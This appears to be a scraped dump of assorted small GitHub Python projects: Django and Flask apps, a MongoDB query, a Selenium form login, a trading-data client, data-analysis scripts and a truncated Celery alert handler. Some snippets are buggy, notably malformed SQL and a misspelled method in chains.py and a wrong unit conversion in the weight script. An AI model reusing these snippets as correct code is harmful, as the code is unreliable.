bar_img_src = utilities.createC128(str(\"%s%s\" % (settings.BAR_CODE_PREFIX, lbo.id)), lbo.create_at)\n lbo.c128_path = bar_img_src\n lbo.save()\n\n data['code'] = 0\n data['message'] = \"Success\"\n return data\n except Exception as e:\n data['code'] = -1\n data['message'] = e\n return data\n","repo_name":"qiaozhizt/OMS","sub_path":"stockorder/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":4969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39368899017","text":"from django.http.response import JsonResponse\nfrom django.shortcuts import redirect, render\nfrom django.http import HttpResponse\nfrom django.db import IntegrityError\nfrom django.contrib.auth import authenticate, login, logout, get_user_model\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.exceptions import ValidationError\n\nfrom .forms import GoalForm, CustomUserCreationForm, LoginForm\nfrom .data import initial_data\nfrom .models import Goal\nfrom therapy.settings import BIBLE_API_KEY\nimport json\nimport requests\n\n\ndef index(request):\n keys = initial_data.keys()\n return render(request, \"index.html\", {\n \"emotions\": keys\n })\n\n\ndef feeling(request, title):\n title = title.capitalize()\n\n emotion_object = initial_data.get(title)\n if emotion_object:\n data = emotion_object['entries']\n src = 'images/' + emotion_object['image']['src']\n alt = emotion_object['image']['alt']\n return render(request, \"emotion.html\", {\n \"data\": data, \"title\": title, \"src\": src, \"alt\": alt\n })\n\n # If data not found, redirect home\n return redirect('index')\n\n\ndef goals(request):\n # Redirect if user not logged in\n if not request.user.is_authenticated:\n messages.info(request, 'Log in to Make a Goal')\n return redirect('login')\n\n # Delete goal\n if request.method == 'DELETE':\n # Parse json data from fetch request and convert into Python Dict\n data = json.loads(request.body)\n\n # Retrieve goal id\n goal_id = data.get(\"goalId\")\n\n # Retrieve goal, verify goal was created by user\n try:\n goal_obj = Goal.objects.get(id=goal_id, setter=request.user)\n goal_obj.delete()\n except:\n return JsonResponse({\"message\": \"problem\"})\n\n #### delete works...but I want to update w/o page reload #########\n return JsonResponse({\"message\": \"success\"})\n\n goal_data = Goal.objects.filter(setter=request.user)\n return render(request, \"goals.html\", {\n \"goals\": goal_data\n })\n\n\ndef set_goal(request, topic, id):\n # Redirect if user not logged in\n if not request.user.is_authenticated:\n messages.info(request, 'Log in to Make a Goal')\n return redirect('login')\n\n topic = topic.capitalize()\n # Try to retrieve requested goal dict from data.py\n try:\n for dict in initial_data[topic]['entries']:\n if (\"id\", id) in dict.items():\n # Prepopulate form\n form = GoalForm(initial=dict)\n return render(request, \"create.html\", {\n 'form': form\n })\n except:\n pass\n\n return redirect('create')\n\n\ndef bible(request):\n # TODO: when changing translation, store data from book and chapter--don't reset\n if request.method == 'POST':\n # Retrieve form data\n data = json.loads(request.body)\n bible_id = data.get('bibleId')\n book_id = data.get('bookId')\n chapter_id = data.get('chapterId')\n\n # Only Bible id found, send request to get bible books\n if bible_id and not book_id and not chapter_id:\n url = f'https://api.scripture.api.bible/v1/bibles/{bible_id}/books'\n headers = {'api-key': BIBLE_API_KEY}\n response = requests.get(url, headers=headers)\n data = response.json()\n bible_books = data[\"data\"]\n\n return JsonResponse({\n 'data': bible_books\n })\n\n # Bible and book id found, send request to get book chapters\n if bible_id and book_id:\n url = f'https://api.scripture.api.bible/v1/bibles/{bible_id}/books/{book_id}/chapters'\n headers = {'api-key': BIBLE_API_KEY}\n response = requests.get(url, headers=headers)\n data = response.json()\n try:\n book_chapters = data[\"data\"]\n except KeyError:\n return JsonResponse({\n 'data': 'keyError'\n })\n\n return JsonResponse({\n 'data': book_chapters\n })\n\n # Bible and chapter id found, send request to get chapter verses\n if bible_id and chapter_id:\n url = f'https://api.scripture.api.bible/v1/bibles/{bible_id}/chapters/{chapter_id}'\n headers = {'api-key': BIBLE_API_KEY}\n response = requests.get(url, headers=headers)\n data = response.json()\n try:\n chapter_verses = data[\"data\"]\n except KeyError:\n return JsonResponse({\n 'data': 'keyError'\n })\n return JsonResponse({\n 'data': chapter_verses\n })\n\n # No data was found\n return JsonResponse({\n 'data': 'not found'\n })\n\n # Use requests for server-side api calls, https://docs.python-requests.org/en/latest/\n\n url = 'https://api.scripture.api.bible/v1/bibles?language=eng'\n headers = {'api-key': BIBLE_API_KEY}\n response = requests.get(url, headers=headers)\n bibles = response.json()\n\n # Remove repetition of translation names\n name_list = []\n bible_list = []\n for bible in bibles[\"data\"]:\n if not bible[\"name\"] in name_list:\n name_list.append(bible[\"name\"])\n bible_list.append(bible)\n\n # Sort bibles by abbreviation name\n bible_list = sorted(\n bible_list, key=lambda bible: bible[\"abbreviationLocal\"])\n\n return render(request, \"bible.html\", {\n \"bibles\": bible_list\n })\n\n\n@login_required(login_url='login')\ndef create_goal(request):\n\n if request.method == \"POST\":\n # Retrieve form data\n form = GoalForm(request.POST)\n\n # Check if valid form\n if form.is_valid():\n\n # No need to use cleaned_data for ModelForm\n goal_obj = form.save(commit=False)\n goal_obj.setter = request.user\n goal_obj.save()\n\n return redirect('goals')\n\n form = GoalForm()\n return render(request, \"create.html\", {\n 'form': form\n })\n\n\ndef register(request):\n\n if request.method == \"POST\":\n form = CustomUserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n\n next_url = request.POST.get('next')\n username = request.POST['username']\n password = request.POST['password1']\n user = authenticate(username=username, password=password)\n\n login(request, user)\n messages.success(request, 'Account created successfully!')\n if next_url:\n return redirect(next_url)\n return redirect('index')\n\n else:\n form = CustomUserCreationForm()\n\n return render(request, \"register.html\", {\n 'form': form\n })\n\n\ndef login_view(request):\n if request.method == \"POST\":\n form = LoginForm(data=request.POST)\n if form.is_valid():\n\n # Get form data\n next_url = request.POST.get('next')\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n\n # Check if valid credentials, if not, a user object is not retrieved\n user = authenticate(request, username=username, password=password)\n\n # Check to see if user exists\n if user is not None:\n login(request, user)\n\n # Check if there was a next parameter to redirect back to\n if next_url:\n return redirect(next_url)\n return redirect(\"index\")\n\n else:\n form = LoginForm()\n return render(request, \"login.html\", {\n 'form': form\n })\n\n\ndef logout_view(request):\n logout(request)\n return redirect(\"index\")\n","repo_name":"markinjamaica/therapy","sub_path":"biblehelp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36798469611","text":"from db import db\nfrom flask import session\n\ndef create_chain(chain_name, chain_message, creater_id, topic_id):\n db.session.execute(\n \"INSERT INTO chains (chain_name, chain_message, creater_id, visible, created_at, topic_id) VALUES (:chain_name, :chain_message, :creater_id, :visible, NOW(), :topic_id )\", {\"chain_name\":chain_name, \"chain_message\":chain_message, \"creater_id\":creater_id, \"visible\": True, \"topic_id\":topic_id }) \n db.session.commit()\n\ndef delete_chain(chain_id, user_id):\n if entitled_to_chain(chain_id, user_id):\n db.session.execute(\"UPDATE chains SET visible=False WHERE id=:id\", {\"id\": chain_id})\n db.session.commit()\n\ndef get_chains(topic_id):\n chains = db.session.execute(\"SELECT chain_name FROM chains WHERE visible=TRUE, topic_id=topic_id\", {\"topic_id\": topic_id})\n return chains.fetchall()\n\ndef get_related_messages(chain_id):\n messages = db.session.execute(\n \"SELECT messages.content, messages.sender_id, messages.id, users.username FROM messages LEFT JOIN users ON messages.sender_id = users.id WHERE visible= True AND messages.chain_id=:chain_id\", {\"chain_id\": chain_id})\n return messages.fetchall()\n\ndef get_chain(chain_id):\n name = db.session.execute(\n \"SELECT chain_name, chain_message FROM chains WHERE id=:chain_id\", {\"chain_id\": chain_id})\n return name.fetchone()\n\ndef get_topic_name(chain_id):\n name = db.session.execute(\n \"SELECT topics.topic_name FROM chains LEFT JOIN topics ON chains.topic_id = topics.id WHERE chains.id =:chain_id\", {\"chain_id\": chain_id})\n return str(name.fetchone())[2:-3] \n\ndef get_creater(chain_id):\n creater = db.session.execute(\n \"SELECT users.username FROM chains LEFT JOIN users ON chains.creater_id = users.id WHERE chains-id = chain_id\", {\"chain_id\": chain_id}\n )\n return creater.fetcone()[0]\n\ndef entitled_to_chain(chain_id, user_id):\n result = db.session.execute(\n \"SELECT creater_id from chains where id=:chain_id\", {\n \"chain_id\": chain_id}\n )\n creater_id = result.fetchone()\n result = db.session.execute(\n \"SELECT type from users where id=:user_id\", {\"user_id\": user_id}\n )\n user_type = result.fetchone()[0]\n return user_id == creater_id or user_type == \"admin\"\n\ndef get_related_topic(chain_id):\n result = db.session.execute(\n \"SELECT topic_id from chains WHERE id=:chain_id\", {\n \"chain_id\": chain_id}\n )\n topic_id = result.fetchone()[0]\n return topic_id\n","repo_name":"eevahanka/tsoha","sub_path":"chains.py","file_name":"chains.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72932456164","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pyximport\npyximport.install()\n\nfrom _eulerfw import EulerForward\n\ndef sine(t, y, fout, Ak=None):\n # x = A*sin(k*t)\n # x' = A*k*cos(k*t)\n # x'' = -A*k**2*sin(k*t)\n A, k = Ak\n fout[0] = y[1]\n fout[1] = -k**2 * y[0]\n\ndef test_sine():\n A, k = [2, 3]\n ef = EulerForward(2, sine, dict(Ak=[A, k]))\n assert ef.get_ny() == 2\n tout = np.linspace(0, 4, 8192)\n y0 = np.array([0., A*k])\n assert ef.get_dx0(0, y0) == 0.0\n assert ef.get_dx_max(0, y0) == float('inf')\n yout, time_wall = ef.integrate(tout, y0)\n yref0 = A*np.sin(k*tout)\n yref1 = A*np.cos(k*tout)*k\n assert np.allclose(np.vstack([yref0, yref1]).T, yout, atol=0.05)\n assert 1e-9 < time_wall < 2.0 # takes about 20 ms on modern 2012 desktop computer\n\nif __name__ == '__main__':\n test_sine()\n","repo_name":"bjodah/anyode","sub_path":"tests/eulerfw/test_eulerfw.py","file_name":"test_eulerfw.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3233695933","text":"import pymongo\r\n\r\nmyClient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\nmydb = myClient[\"FootballDBMongo\"]\r\n\r\n\r\nprint(\"This query will give the top 5 attackers based on your team budget and player base price \")\r\nuserInputTeam = input(\"Enter the team name : \")\r\n\r\nqueryString_partOne = {}\r\n\r\nqueryString_partOne = {\"name\": userInputTeam}\r\nqueryString_partTwo = {\"Budget\": 1, \"_id\": 0}\r\n\r\nx = mydb.clubStats.find(queryString_partOne, queryString_partTwo)\r\n\r\nhas_val = True if mydb.clubStats.count_documents({\"name\": userInputTeam}) > 0 else False\r\n\r\nif has_val:\r\n\r\n for firstValue in x:\r\n\r\n for a in firstValue:\r\n\r\n queryString_partThree = {\r\n \"$and\": [{\"Position\": \"Attacker\"}, {\"BasePrice\": {\"$lt\": firstValue[a]}}, {\"Team\": {\"$ne\": userInputTeam}}]}\r\n\r\n queryString_partFour = {\"Name\": 1, \"_id\": 0, \"BasePrice\": 1, \"Team\": 1}\r\n\r\n y = mydb.playerStats.find(queryString_partThree, queryString_partFour)\r\n sortedList = y.sort(\"BasePrice\", pymongo.DESCENDING)\r\n listOfDocuments = sortedList.limit(5)\r\n print(\"---LIST OF SUITABLE ATTACKERS IN YOUR PRICE RANGE---\")\r\n for eachDocument in sortedList:\r\n print(eachDocument)\r\n\r\nelse:\r\n print(\"No records found\")\r\n","repo_name":"chinmay81192/Information-Systems","sub_path":"Story1c.py","file_name":"Story1c.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21068974282","text":"from flask import Blueprint, g, render_template, request\nimport sqlite3\n\n# Here go the routes\n\nviews = Blueprint(\"views\", __name__)\n\n@views.route(\"/\")\ndef home():\n if request.method == \"POST\":\n return None\n else:\n return render_template(\"index.html\")","repo_name":"daniel-locatelli/ccc","sub_path":"website-oldMoreStructured/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9605388727","text":"#REMEMBER TO CHANGE YOUR FILEPATH AND ADD A FOLDER... \n#IN THIS CASE THE FOLDER IS CALLED \"db\"\n\nfrom datetime import datetime\nnow = datetime.now()\ncurrent_time = now.strftime(\"%c\")\n\nname = str(input(\"What's your name? \"))\nsurname = str(input(\"What's your surname? \"))\nage = int(input(\"What's your age? \"))\nweight = float(input(\"What's your weight? \"))\nweightu = str(input(\"Kg's(K) or Lb's?(L) \"))\n\nif weightu == \"L\":\n weight = weight * 0.45\nelif weightu == \"K\":\n weight = weight / 0.45\n\nresult = (\"Your name: \" + name, \"Your Surname: \" + surname, \"Your Age: \" + str(age), \"Your weight \" + str(weight))\nresult = str(result)\nprint (result)\n\n\nwith open('db/db.txt', 'at') as f:\n f.write('\\nDB started | ')\n f.write(str(current_time))\n f.write (\"\\n\" + \"\\n\")\nf = open(\"db/db.txt\", \"at\") #CHANGE THIS\nf.write(result)\nf.close\nf = open(\"db/db.txt\") #CHANGE THIS\nprint(str(f))\n","repo_name":"Goatl33t/weight-checker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"192077964","text":"from functools import cached_property\n\nfrom fastapi import APIRouter, Depends, HTTPException, status\nfrom pydantic import UUID4\n\nfrom mealie.schema.group.group import GroupAdminUpdate\nfrom mealie.schema.mapper import mapper\nfrom mealie.schema.response.pagination import PaginationQuery\nfrom mealie.schema.response.responses import ErrorResponse\nfrom mealie.schema.user.user import GroupBase, GroupInDB, GroupPagination\nfrom mealie.services.group_services.group_service import GroupService\n\nfrom .._base import BaseAdminController, controller\nfrom .._base.mixins import HttpRepo\n\nrouter = APIRouter(prefix=\"/groups\", tags=[\"Admin: Groups\"])\n\n\n@controller(router)\nclass AdminUserManagementRoutes(BaseAdminController):\n @cached_property\n def repo(self):\n if not self.user:\n raise Exception(\"No user is logged in.\")\n\n return self.repos.groups\n\n # =======================================================================\n # CRUD Operations\n\n @property\n def mixins(self):\n return HttpRepo[GroupBase, GroupInDB, GroupAdminUpdate](\n self.repo,\n self.logger,\n self.registered_exceptions,\n )\n\n @router.get(\"\", response_model=GroupPagination)\n def get_all(self, q: PaginationQuery = Depends(PaginationQuery)):\n response = self.repo.page_all(\n pagination=q,\n override=GroupInDB,\n )\n\n response.set_pagination_guides(router.url_path_for(\"get_all\"), q.dict())\n return response\n\n @router.post(\"\", response_model=GroupInDB, status_code=status.HTTP_201_CREATED)\n def create_one(self, data: GroupBase):\n return GroupService.create_group(self.repos, data)\n\n @router.get(\"/{item_id}\", response_model=GroupInDB)\n def get_one(self, item_id: UUID4):\n return self.mixins.get_one(item_id)\n\n @router.put(\"/{item_id}\", response_model=GroupInDB)\n def update_one(self, item_id: UUID4, data: GroupAdminUpdate):\n group = self.repo.get_one(item_id)\n\n if data.preferences:\n preferences = self.repos.group_preferences.get_one(value=item_id, key=\"group_id\")\n preferences = mapper(data.preferences, preferences)\n group.preferences = self.repos.group_preferences.update(item_id, preferences)\n\n if data.name not in [\"\", group.name]:\n group.name = data.name\n group = self.repo.update(item_id, group)\n\n return group\n\n @router.delete(\"/{item_id}\", response_model=GroupInDB)\n def delete_one(self, item_id: UUID4):\n item = self.repo.get_one(item_id)\n\n if item and len(item.users) > 0:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=ErrorResponse.respond(message=\"Cannot delete group with users\"),\n )\n\n return self.mixins.delete_one(item_id)\n","repo_name":"mealie-recipes/mealie","sub_path":"mealie/routes/admin/admin_management_groups.py","file_name":"admin_management_groups.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","stars":3977,"dataset":"github-code","pt":"52"} +{"seq_id":"4814687120","text":"from lib2to3.pgen2.driver import Driver\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import Select\n\n\noptions = webdriver.ChromeOptions()\noptions.add_experimental_option(\"detach\", True)\n\n#edgeBrowser = webdriver.Edge(r\"D:\\Edge-driver\\msedgedriver.exe\")\n\ndriver = webdriver.Chrome(options=options,executable_path=r'')\n\n#driver.maximize_window()\n\n\nurl1=\"\"\n\ndriver.get(url1)\n\n \n#Login into web page using selenium\n\nuser_block = driver.find_element(\"name\", \"username\")\npw_block = driver.find_element_by_name(\"password\")\n\nuser_block.send_keys(\"Admin\")\npw_block.send_keys(\"Admin123\")\n\nhtml_list = driver.find_element_by_id(\"sessionLocation\")\nitems = html_list.find_elements_by_tag_name(\"li\")\nfor item in items:\n text = item.text\n if(text==\"Laboratory\"):\n clickingUl=driver.find_element_by_id(text)\n clickingUl.click()\n print(text)\n\nsubmit_button = driver.find_element_by_xpath(\"//input[@type='submit']\")\n\nsubmit_button.click()\n\n\n\nddelement= Select(driver.find_element_by_id('id_contact'))\nddelement.select_by_index(1)\n\n\nemail = driver.find_element(\"id\", \"email\")\nemail.send_keys(\"test@gmail.com\")\norderReference=driver.find_element(\"id\", \"id_order\")\norderReference.send_keys(\"Admin\")\nMessage=driver.find_element(\"name\", \"message\")\nMessage.send_keys(\"ok\")\n\n\nsubmit_button = driver.find_element(\"id\", \"submitMessage\")\nsubmit_button.click()\n\ndriver.get_screenshot_as_file(\"capture.png\")","repo_name":"VigneshEswaramurthi/Web-Automation-using-Selenium","sub_path":"webAutomation.py","file_name":"webAutomation.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29329786824","text":"import time\r\nimport logging\r\nimport requests\r\nimport json\r\nfrom lib.broker_api.broker_api import BrokerAPI\r\n\r\nclass TDAClient(BrokerAPI):\r\n def __init__(self, params):\r\n if \"api_key\" not in params:\r\n raise KeyError(\"api_key must be provided for TDAClient\")\r\n self.api_key = params[\"api_key\"]\r\n\r\n def get_price_history(self, symbol, start_date, end_date, minute_frequency):\r\n s = time.perf_counter()\r\n query_url = f\"https://api.tdameritrade.com/v1/marketdata/{symbol}/pricehistory?apikey={self.api_key}&periodType=day&frequencyType=minute&frequency={minute_frequency}&endDate={end_date}000&startDate={start_date}000\"\r\n logging.info(query_url)\r\n r = requests.get(query_url)\r\n #print(r.text)\r\n candles = []\r\n for stock_record in r.json()['candles']:\r\n # sample stock_record\r\n # {'open': 223.44, 'high': 223.5, 'low': 223.4, 'close': 223.5, 'volume': 4867, 'datetime': 1570661040000}\r\n stock_record['stock'] = symbol.lower()\r\n stock_record['stimestamp'] = stock_record.pop('datetime')\r\n\r\n stock_record['volume'] = int(stock_record['volume'])\r\n stock_record['stimestamp'] = int(stock_record['stimestamp'])\r\n\r\n #print(stock_record)\r\n candles.append(stock_record)\r\n\r\n elapsed = time.perf_counter() - s\r\n logging.info(f\"Got {len(candles)} price history data points for {symbol} at {minute_frequency} minute interval {__file__} in {elapsed:0.2f} seconds.\")\r\n return candles\r\n\r\n def get_market_hours(self, date):\r\n query_url = f\"https://api.tdameritrade.com/v1/marketdata/hours?apikey={self.api_key}&markets=EQUITY,OPTION,BOND&date={date}\"\r\n logging.info(query_url)\r\n\r\n r = requests.get(query_url)\r\n return r.json()\r\n","repo_name":"tomtupy/market-data-worker","sub_path":"lib/broker_api/td_ameritrade/tda_client.py","file_name":"tda_client.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36027921794","text":"import os\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport random\n\n# input the mean of a df and format into a list ready to plot\ndef format_list(df):\n list = []\n x_values = []\n for i in range(len(df) - 2):\n x_values.append(i)\n list.append(df.iloc[i+1])\n return x_values, list\n\n\n# input the mean of a df and format into a list ready to plot\ndef format_list_sums(df):\n list = []\n x_values = []\n for i in range(len(df) - 1):\n x_values.append(i)\n list.append(df.iloc[i+1])\n return x_values, list\n\n\n# input the mean of a df and format into a list ready to plot\ndef format_list_norms(df):\n list = []\n for i in range(len(df) - 1):\n list.append(df.iloc[i+1])\n return list\n\n\n\n\"\"\"\n\ntrain test split analysis\n\n\"\"\"\n\n\ndef predict_tick(pnorm):\n if pnorm <= divider1:\n return 0\n if pnorm <= divider2:\n return 48\n if pnorm <= divider3:\n return 96\n return 144\n\nperc_0 = []\nperc_48 = []\nperc_96 = []\nperc_144 = []\nperc_all = []\n\n\nfor k in range(100):\n # creates random list of simulations to be used for train test split (70/30)\n train = [i for i in range(25)]\n test = random.sample(train, 0)\n for j in test:\n train.remove(j)\n\n\n # all_norms = pd.read_csv(\"17_7_60_3_all.csv\")\n # leftright = pd.read_csv(\"17_7_60_3_all_bu.csv\")\n # another = pd.read_csv(\"17_7_60_3_all_rl\")\n # anotheranother = pd.read_csv(\"17_7_60_3_all_td.csv\")\n #\n all_norms = pd.read_csv(\"25sim_lr.csv\")\n leftright = pd.read_csv(\"25sim_rl.csv\")\n another = pd.read_csv(\"25sim_td.csv\")\n anotheranother = pd.read_csv(\"25sim_bu.csv\")\n all_norms[\"0\"] = (all_norms[\"0\"] + another[\"0\"]+leftright[\"0\"]+anotheranother[\"0\"])/4\n\n\n tick_0 = all_norms.loc[all_norms[\"tick number\"] == 0]\n train_tick_0 = [tick_0.iloc[i].loc[\"0\"] for i in train]\n test_tick_0 = [tick_0.iloc[i].loc[\"0\"] for i in test]\n\n tick_48 = all_norms.loc[all_norms[\"tick number\"] == 48]\n train_tick_48 = [tick_48.iloc[i].loc[\"0\"] for i in train]\n test_tick_48 = [tick_48.iloc[i].loc[\"0\"] for i in test]\n\n tick_96 = all_norms.loc[all_norms[\"tick number\"] == 96]\n train_tick_96 = [tick_96.iloc[i].loc[\"0\"] for i in train]\n test_tick_96 = [tick_96.iloc[i].loc[\"0\"] for i in test]\n\n tick_144 = all_norms.loc[all_norms[\"tick number\"] == 144]\n train_tick_144 = [tick_144.iloc[i].loc[\"0\"] for i in train]\n test_tick_144 = [tick_144.iloc[i].loc[\"0\"] for i in test]\n\n\n\n divider1 = (min(train_tick_48) + max(train_tick_0))/2\n # if (min(train_tick_48) - max(train_tick_0)) < 0:\n # print(f'overlap between 0 and 48 of {min(train_tick_48) - max(train_tick_0)}')\n\n divider2 = (min(train_tick_96) + max(train_tick_48))/2\n # if (min(train_tick_96) - max(train_tick_48)) < 0:\n # print(f'overlap between 96 and 48 of {min(train_tick_96) - max(train_tick_48)}')\n\n divider3 = (min(train_tick_144) + max(train_tick_96))/2\n # if (min(train_tick_144) - max(train_tick_96)) < 0:\n # print(f'overlap between 96 and 144 of {min(train_tick_144) - max(train_tick_96)}')\n\n\n correct_0 = 0\n for tick in test_tick_0:\n if predict_tick(tick) == 0:\n correct_0 = correct_0 + 1\n perc_0.append(correct_0)\n\n correct_48 = 0\n for tick in test_tick_48:\n if predict_tick(tick) == 48:\n correct_48 = correct_48 + 1\n perc_48.append(correct_48)\n\n correct_96 = 0\n for tick in test_tick_96:\n if predict_tick(tick) == 96:\n correct_96 = correct_96 + 1\n perc_96.append(correct_96)\n\n correct_144 = 0\n for tick in test_tick_144:\n if predict_tick(tick) == 144:\n correct_144 = correct_144 + 1\n perc_144.append(correct_144)\n\n\n perc_all.append(correct_0+correct_48+correct_96+correct_144)\n\nprint(sum(perc_0)/300)\nprint(sum(perc_48)/300)\nprint(sum(perc_96)/300)\nprint(sum(perc_144)/300)\nprint(sum(perc_all)/1200)\n\n\n\n# exit()\n\n\n\"\"\"\n\ntrain test split analysis\n\n\"\"\"\n\n\ndef predict_tick(pnorm):\n if pnorm <= divider1:\n return 0\n if pnorm <= divider2:\n return 48\n if pnorm <= divider3:\n return 96\n return 144\n\nperc_0 = []\nperc_48 = []\nperc_96 = []\nperc_144 = []\nperc_all = []\n\n\n\n\"\"\"\n\ngraphs the p norms from simulations 1-100, and the histogram for each time tick\n\n\"\"\"\n\ntick_0 = all_norms.loc[all_norms[\"tick number\"] == 0]\ntick_48 = all_norms.loc[all_norms[\"tick number\"] == 48]\ntick_96 = all_norms.loc[all_norms[\"tick number\"] == 96]\ntick_144 = all_norms.loc[all_norms[\"tick number\"] == 144]\n\nsize = 3\nplt.scatter(tick_0[\"0\"], tick_0[\"tick number\"], s=size)\nplt.scatter(tick_48[\"0\"], tick_48[\"tick number\"], s=size)\nplt.scatter(tick_96[\"0\"], tick_96[\"tick number\"], s=size)\nplt.scatter(tick_144[\"0\"], tick_144[\"tick number\"], s=size)\n\n# plots the midlines\nplt.plot([divider1, divider1], [-10, 200], \"black\")\nplt.plot([divider2, divider2], [-10, 200], \"black\")\nplt.plot([divider3, divider3], [-10, 200], \"black\")\n\nplt.ylim(0, 150)\nplt.ylabel(\"Time Tick\")\nplt.xlabel(\"Persistence Landscape Norms\")\nplt.show()\n\n# # exit()\n#\n# plt.hist(tick_0[\"0\"])\n# plt.show()\n#\n# plt.hist(tick_48[\"0\"])\n# plt.show()\n#\n# plt.hist(tick_96[\"0\"])\n# plt.show()\n#\n# plt.hist(tick_144[\"0\"])\n# plt.show()\n#\n# print(tick_0.mean(), tick_0.std())\n# print(tick_48.mean(), tick_48.std())\n# print(tick_96.mean(), tick_96.std())\n# print(tick_144.mean(), tick_144.std())\n#\n#\n# # prints the index of the outlier simulations\n# for i in range(len(tick_144)):\n# if tick_144.iloc[i][\"0\"] > 375:\n# print(i)\n\n\n\n\"\"\"\n\ngraphs the p norm for each simulation\n\n\"\"\"\n\ntrain_tick_0 = [tick_0.iloc[i].loc[\"0\"] for i in range(25)]\ntrain_tick_48 = [tick_48.iloc[i].loc[\"0\"] for i in range(25)]\ntrain_tick_96 = [tick_96.iloc[i].loc[\"0\"] for i in range(25)]\ntrain_tick_144 = [tick_144.iloc[i].loc[\"0\"] for i in range(25)]\n\nfor i in range(25):\n plt.plot([0, 48, 96, 144], [train_tick_0[i], train_tick_48[i], train_tick_96[i], train_tick_144[i]])\nplt.xlabel(\"Time Tick\")\nplt.ylabel(\"Norm of Persistence Landscape\")\nplt.show()\nprint(type(train_tick_0))\n\nplt.plot([0, 48, 96, 144],[sum(train_tick_0)/25, sum(train_tick_48)/25, sum(train_tick_96)/25, sum(train_tick_144)/25])\nplt.xlabel(\"Time Tick\")\nplt.ylabel(\"Average Norm of Persistence Landscape\")\nplt.show()\n\n\n\n\n\n\"\"\"\n\ngraphs the vectors and sums from simulations 1-100\n\n\"\"\"\n\n#\n# all_vectors = pd.read_csv(\"vectors_152_6.csv\")\n# all_vectors.fillna(0, inplace=True)\n#\n# tick_0 = all_vectors.loc[all_vectors[\"tick number\"] == 0]\n# tick_48 = all_vectors.loc[all_vectors[\"tick number\"] == 48]\n# tick_96 = all_vectors.loc[all_vectors[\"tick number\"] == 96]\n# tick_144 = all_vectors.loc[all_vectors[\"tick number\"] == 144]\n#\n# tick_0_mean = format_list(tick_0.mean())\n# tick_48_mean = format_list(tick_48.mean())\n# tick_96_mean = format_list(tick_96.mean())\n# tick_144_mean = format_list(tick_144.mean())\n#\n# sums = pd.read_csv(\"sums_normalized_lr.csv\")\n# sums_means = format_list_sums(sums.mean())\n#\n# # plt.plot(tick_0_mean[0], tick_0_mean[1])\n# # plt.plot(tick_48_mean[0], tick_48_mean[1])\n# # plt.plot(tick_96_mean[0], tick_96_mean[1])\n# # plt.plot(tick_144_mean[0], tick_144_mean[1])\n# # plt.show()\n#\n# plt.plot(sums_means[0], sums_means[1])\n# plt.xlabel(\"Time Tick\")\n# plt.ylabel(\"Average Sum\")\n# plt.show()\n# exit()","repo_name":"jmdrisco/tortuosity_tda","sub_path":"source/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":7251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6017162763","text":"from django.urls import path, include\nfrom rest_framework import routers, serializers, viewsets\nfrom . import views\n\n# URLConf\napp_name='blog'\nurlpatterns = [\n path('', views.index, name='index'),\n path('main_info/', views.main_info, name='main_info'),\n path('experience/', views.experience, name='experience'),\n path('education/', views.education, name='education'),\n]","repo_name":"temirlanr/test-project","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41258290633","text":"from lxml import etree\nfrom urllib.parse import urlparse\nfrom celery import group\nfrom celery.utils.log import get_logger\n\nfrom ..import app\nfrom .core import identity\nfrom . import detchar\nfrom . import gcn\nfrom . import gracedb\nfrom . import external_skymaps\nfrom . import igwn_alert\nfrom . import raven\n\nlog = get_logger(__name__)\n\n\nREQUIRED_LABELS_BY_TASK = {\n 'compare': {'SKYMAP_READY', 'EXT_SKYMAP_READY', 'EM_COINC'},\n 'combine': {'SKYMAP_READY', 'EXT_SKYMAP_READY', 'RAVEN_ALERT'}\n}\n\"\"\"These labels should be present on an external event to consider it to\nbe ready for sky map comparison.\n\"\"\"\n\nFERMI_GRB_CLASS_VALUE = 4\n\"\"\"This is the index that denote GRBs within Fermi's Flight Position\nclassification.\"\"\"\n\nFERMI_GRB_CLASS_THRESH = 50\n\"\"\"This values denotes the threshold of the most likely Fermi source\nclassification, above which we will consider a Fermi Flight Position\nnotice.\"\"\"\n\n\n@gcn.handler(gcn.NoticeType.SNEWS,\n queue='exttrig',\n shared=False)\ndef handle_snews_gcn(payload):\n \"\"\"Handles the payload from SNEWS alerts.\n\n Prepares the alert to be sent to graceDB as 'E' events.\n \"\"\"\n root = etree.fromstring(payload)\n\n # Get TrigID and Test 